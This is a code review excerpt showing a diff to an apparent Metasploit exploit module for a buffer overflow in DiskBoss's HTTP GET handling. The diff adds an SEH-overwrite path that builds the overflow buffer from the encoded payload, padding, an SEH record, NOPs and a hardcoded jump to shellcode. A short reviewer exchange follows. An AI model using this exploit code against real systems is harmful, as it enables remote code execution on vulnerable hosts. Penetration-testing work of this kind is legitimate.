modules/exploits/windows/http/diskboss_get_bof.rb

```diff
@@ -115,11 +127,22 @@ def exploit
       print_status("Selected Target: #{mytarget.name}")
     end
 
-    sploit =  make_nops(21)
-    sploit << payload.encoded
-    sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
-    sploit << [mytarget.ret].pack('V')
-    sploit << rand_text_alpha(2500)
+    if !(mytarget == targets[3])
+      sploit =  make_nops(21)
+      sploit << payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit << [mytarget.ret].pack('V')
+      sploit << rand_text_alpha(2500)
+    else
+      seh = generate_seh_record(mytarget.ret)
+      sploit = payload.encoded
+      sploit << rand_text_alpha(mytarget['Offset'] - payload.encoded.length)
+      sploit[sploit.length, seh.length] = seh
+      sploit <<  make_nops(10)
+      sploit << "\xE9\x25\xBF\xFF\xFF"   # JMP to ShellCode
```

Comment:
How about `Rex::Arch::X86.jmp(0xffffbf25)` and document what the address is?

Reply:
I took a note to look this up and add it later, will land for now.  Thx!